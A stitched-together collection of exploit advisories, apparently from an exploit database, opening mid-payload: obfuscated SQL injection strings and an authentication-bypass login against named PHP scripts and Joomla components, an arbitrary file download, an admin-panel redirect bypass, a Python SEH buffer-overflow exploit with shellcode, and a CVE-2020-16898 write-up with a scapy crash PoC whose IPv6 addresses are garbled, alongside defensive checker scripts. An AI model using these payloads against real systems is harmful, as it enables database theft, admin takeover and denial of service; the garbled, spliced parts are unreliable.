# 8+aND(/*!22200sELeCT*/+0x30783331+/*!22200FrOM*/+(/*!22200SeLeCT*/+cOUNT(*),/*!22200CoNCaT*/((sELEcT(sELECT+/*!22200CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
            
# #
# Exploit Title: Auto Car - Car listing Script 1.1 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor: http://kamleshyadav.com/
# Software Link: https://codecanyon.net/item/auto-car-car-listing-script/19221368
# Demo: http://kamleshyadav.com/scripts/autocar_preview/
# Version: 1.1
# Tested on: WiN10_X64
# Exploit Author: Bora Bozdogan
# Author WebSite : http://borabozdogan.net.tr
# Author E-mail : borayazilim45@mit.tc
# #	
# POC:
# 
# http://localhost/[PATH]/search-cars?category=[SQL]
# ts_user
#  user_uname
#  user_fname
#  user_lname
#  user_email
#  user_pwd
# #
            
# # # # # 
# Exploit Title: Joomla! Component Photo Contest 1.0.2 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: http://keenitsolution.com/
# Software Link: https://codecanyon.net/item/photo-contest-joomla-extension/13268866
# Demo: http://photo.keenitsolution.com/
# Version: 1.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/photo-contest/photocontest/vote?controller=photocontest&vid=[SQL]
#
# 1'aND+(/*!22200sEleCT*/+1+/*!22200FrOM*/+(/*!22200sEleCT*/+cOUNT(*),/*!22200CoNCAt*/((/*!22200sEleCT*/(/*!22200sEleCT*/+/*!22200CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!22200FrOM*/+infOrMation_schEma.tables+where+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!22200FrOM*/+infOrMation_schEma.tABLES+/*!22200gROUP*/+bY+x)a)+aND+''='
#
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Joomla! Component RPC - Responsive Portfolio 1.6.1 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://extro.media/
# Software Link: https://extensions.joomla.org/extension/rpc-responsive-portfolio/
# Demo: https://demo.extro.media/responsive-joomla-extensions-en/video-en
# Version: 1.6.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_pofos&view=pofo&id=[SQL]
#
# Etc..
# # # # #
            
#!/usr/bin/python

#========================================================================================================================
# Exploit Author     :  Touhid M.Shaikh
# Exploit Title      : Easy RM RMVB to DVD Burner 1.8.11 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date :  28-08-2017
# Website : www.touhidshaikh.com
# Contact : https://github.com/touhidshaikh
# Vulnerable Software:  Easy RM RMVB to DVD Burner
# Vendor Homepage:      http://www.divxtodvd.net/
# Version:              1.8.11
# Software Link:        http://www.divxtodvd.net/easy_rm_to_dvd.exe
# Tested On:            Windows 7 x86
#
#
# To reproduce the exploit:
#   1. Click Register
#   2. In the "Enter User Name" field, paste the content of calc.txt
#
#========================================================================================================================


buffer = "\x41" * 1008

nSEH = "\xeb\x10\x90\x90"

# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ}
# [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = "\x59\x78\x03\x10"

badchars = "\x00\x0a\x0d" # and 0x80 to 0xff

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf =  ""
buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"

nops = "\x90" * 16

data = buffer + nSEH + SEH + nops + buf

f = open ("calc.txt", "w")
f.write(data)
f.close()

#Greetz => Jack Carlo

            
# # # # # 
# Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022
# Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to download arbitrary files..
#
# Vulnerable Source:
#
# .............
# <?php
# $file = base64_decode($_GET['id']);
# 
# if (file_exists($file)) {
#     header('Content-Description: File Transfer');
#     header('Content-Type: application/octet-stream');
#     header('Content-Disposition: attachment; filename="'.basename($file).'"');
#     header('Expires: 0');
#     header('Cache-Control: must-revalidate');
#     header('Pragma: public');
#     header('Content-Length: ' . filesize($file));
#     readfile($file);
#     exit;
# }
# ?>
# .............
# Proof of Concept:
#
# http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64]
# 
# Etc...
# # # # #
            
# # # # # 
# Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747
# Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/admin-ftp-del.php?id=[SQL]
# http://localhost/[PATH]/admin-ftp-change.php?id=[SQL]
#
# 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
#
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://codesgit.com/
# Software Link: https://www.codester.com/items/997/smart-chat-php-script
# Demo: http://demos.codesgit.com/smartchat/
# Version: 1.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/admin.php
# User: 'or 1=1 or ''=' Pass: anything
# 
# http://localhost/[PATH]/index.php?p=smiles&handel=[SQL]
#
# '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+-
#
# Etc...
# # # # #
            

0x00 Vulnerability background

On October 14, 2020, monitoring found that Microsoft had issued a risk notice for a TCP/IP remote code execution vulnerability. The flaw lies in the Windows TCP/IP stack's handling of ICMPv6 Router Advertisement packets: a remote attacker can build a specially crafted ICMPv6 Router Advertisement packet and send it to a remote Windows host, which can cause a remote BSOD. The vulnerability number is CVE-2020-16898.

0x01 Affected versions

Operating system                                          Architecture      Version
Windows 10                                                x86/x64/arm64     1709
Windows 10                                                x86/x64/arm64     1803
Windows 10                                                x86/x64/arm64     1809
Windows 10                                                x86/x64/arm64     1903
Windows 10                                                x86/x64/arm64     1909
Windows 10                                                x86/x64/arm64     2004
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

0x02 Vulnerability cause

According to RFC 5006, the Length of an RDNSS option must be odd. When an attacker builds an RDNSS option with an even Length, the Windows TCP/IP stack computes each option's offset from that Length during packet validation, so the packet passes the check; when it then parses the IPv6 recursive DNS server addresses it miscalculates the option boundary, reads into the following RDNSS option, and the system crashes.
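As an added defender-side example (not from the original post or the repositories it cites), the check below walks the ND options of a reassembled Router Advertisement and flags any RDNSS option whose Length field is even or below 3, which the RFC never allows; the RA header layout, the helper names and the sample addresses are constructed here.

```python
import socket
import struct
from typing import List, Tuple

ND_OPT_RDNSS = 25        # RDNSS option type (RFC 5006 / RFC 8106)
RA_HEADER_LEN = 16       # ICMPv6 Router Advertisement fixed header (RFC 4861)

def parse_nd_options(body: bytes) -> List[Tuple[int, int, bytes]]:
    """Walk the ND option TLVs that follow the RA header.
    Returns (type, length, raw_option) triples; length is in 8-octet units."""
    opts, off = [], 0
    while off < len(body):
        if len(body) - off < 2:
            raise ValueError(f"truncated option header at offset {off}")
        otype, olen = body[off], body[off + 1]
        if olen == 0:                        # RFC 4861: Length 0 is always invalid
            raise ValueError(f"zero-length option at offset {off}")
        size = olen * 8
        if off + size > len(body):
            raise ValueError(f"option at offset {off} overruns the packet")
        opts.append((otype, olen, body[off:off + size]))
        off += size
    return opts

def check_rdnss(opts) -> List[str]:
    """Flag RDNSS options whose Length cannot describe a whole number of
    16-byte addresses: the RFC requires an odd Length of at least 3."""
    findings = []
    for i, (otype, olen, _) in enumerate(opts):
        if otype == ND_OPT_RDNSS and (olen < 3 or olen % 2 == 0):
            findings.append(f"option {i}: RDNSS length {olen} is invalid "
                            f"(must be odd and >= 3); treat as malformed")
    return findings

def inspect_ra(icmpv6: bytes) -> List[str]:
    """Inspect one reassembled ICMPv6 RA message (type 134); return findings."""
    if len(icmpv6) < RA_HEADER_LEN or icmpv6[0] != 134:
        raise ValueError("not a Router Advertisement")
    return check_rdnss(parse_nd_options(icmpv6[RA_HEADER_LEN:]))

def rdnss_option(length: int, addrs: List[str], lifetime: int = 3600) -> bytes:
    """Build a raw RDNSS option with an explicit Length field (constructed test
    data). The body is padded so the option occupies length*8 bytes."""
    body = struct.pack("!BBHI", ND_OPT_RDNSS, length, 0, lifetime)
    body += b"".join(socket.inet_pton(socket.AF_INET6, a) for a in addrs)
    return body.ljust(length * 8, b"\x00")

# Constructed RA header: type 134, code 0, checksum 0, cur hop limit 64,
# flags 0, router lifetime 1800, reachable time 0, retrans timer 0.
RA_HDR = struct.pack("!BBHBBHII", 134, 0, 0, 64, 0, 1800, 0, 0)
GOOD_RA = RA_HDR + rdnss_option(3, ["2001:db8::53"])   # one address, Length 3
BAD_RA = RA_HDR + rdnss_option(4, ["2001:db8::53"])    # even Length: malformed

if __name__ == "__main__":
    print(inspect_ra(GOOD_RA))   # []
    print(inspect_ra(BAD_RA))    # one finding about Length 4
```

Because the PoC on this page splits the RA across IPv6 fragments with fragment6, an inspector must reassemble the fragments before running this check.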

0x03 Vulnerability reproduction

Attack machine: Win10 x64

Target machine: Windows 10 x64_1709

1. Enable IPv6 on the victim host via VMware.

2. Change the IPv6 addresses in the CVE-2020-16898.py script; these are the link-local IPv6 addresses of the attack machine and the target machine.

#!/usr/bin/env python3
# Proof-of-concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl

from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6

v6_dst = 'FD1533604BA5:5A2B:1008:9D373:36D2:3360336:6496'  # target machine IPv6 address
v6_src = 'FE803:3360EC1E:A7AA:6717:67C6%13'  # attack machine link-local IPv6 address

p_test_half = 'a'.encode()*8 + b'\x18\x30' + b'\xff\x18'
p_test = p_test_half + 'a'.encode()*4

c = ICMPv6NDOptEFA()

e = ICMPv6NDOptRDNSS()
e.len = 21
# DNS address list as reproduced in the source (garbled); each entry should be a valid IPv6 address string
e.dns = [
    'AAA:AAAAA:AAA:AAAA:FFF:AAAAAA:AAA:AAAAA33333:AAAA:AAAAAA3:AAAAAA',
    'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA',
    'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA',
    'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA',
    'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA',
    'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA',
    'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA',
    'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA',
    'AAA:AAAA:AAA:AAAA:AAA3360AAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3333:AAAAAAA',
    'AAA:AAAA:AAA:AAAA:AAA:AAA3360AAA33:AAAA3360AAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
]

aaa = ICMPv6NDOptRDNSS()
aaa.len = 8

pkt = ICMPv6ND_RA()/aaa/\
      Raw(load='a'.encode()*16*2 + p_test_half + b'\x18\xa0'*6)/c/e/c/e/c/e/c/e/c/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e/e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/\
              IPv6ExtHdrFragment()/pkt

l = fragment6(p_test_frag, 200)

for p in l:
    send(p)

3. Finally, install the dependency with pip3 install scapy and run CVE-2020-16898.py; the target machine shows a blue screen.

4. Local check script: CVE-2020-16898_checker.ps1

########################################################################################################################################
### Written by Cyril Pineiro / Synapsys-IT, 14/10/2020
### Checks whether the network interfaces are vulnerable to CVE-2020-16898 / CVE-2020-16899
### Returns the interface index and alias
########################################################################################################################################

Clear

$interfaces = (Get-NetIPInterface | where { $_.AddressFamily -eq 'IPv6' }).ifIndex

foreach ($interface in $interfaces)
{
    [bool]$vuln = $false

    $output = netsh int ipv6 sh interfaces interface=$interface

    foreach ($line in $output)
    {
        # '6106' matches the "RA Based DNS Config (RFC 6106)" line of the netsh output
        if ($line.Contains('6106') -and $line.Contains('enabled'))
        {
            [bool]$vuln = $true
        }
    }

    $netIPInterfaceAlias = ((Get-NetIPAddress -InterfaceIndex $interface | Select-Object InterfaceAlias)[0]).InterfaceAlias

    if ($vuln)
    {
        Write-Host "Interface" $($interface) "" $($netIPInterfaceAlias) "is vulnerable to CVE-2020-16898 CVE-2020-16899" -ForegroundColor Red
    }
    else
    {
        Write-Host "Interface" $($interface) "" $($netIPInterfaceAlias) "is NOT vulnerable to CVE-2020-16898 CVE-2020-16899" -ForegroundColor Green
    }
}

0x04 Vulnerability fix

Find the patch matching your operating system version at the following link, then download and install it:

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-16898

0x05 References

https://github.com/momika233/cve-2020-16898-exp/blob/main/cve-2020-16898.py

https://github.com/cpo-eh/cve-2020-16898_checker/blob/main/cve-2020-16898_checker.ps1

https://github.com/ascotbe/kernelhub/tree/master/cve-2020-16898

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<!-- 
# Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: N/A
# Date: 27.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Link: http://www.mscript.in/
# Version: 2.7
# Category: Webapps
# Tested on: windows 7 / mozila firefox 
# supporting tools for testing : No-Redirect Add-on in firefox
#
--!>

# ========================================================
#
#
# admin panel Authentication bypass 
# 
# Description : Attackers are able to completely compromise a web application built upon
# Matrimonial Script, as they can gain access to the admin panel and manage the website as an admin without
# prior authentication!
# 
# Proof of Concept : - 
# Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
# Step 2: Access http://example.com/path/admin/index.php
# 
# 
# Risk : Unauthenticated attackers are able to gain full access to the administrator panel
# and thus have total control over the web application, including changing content, adding admin users, etc.
#
#
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained 
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #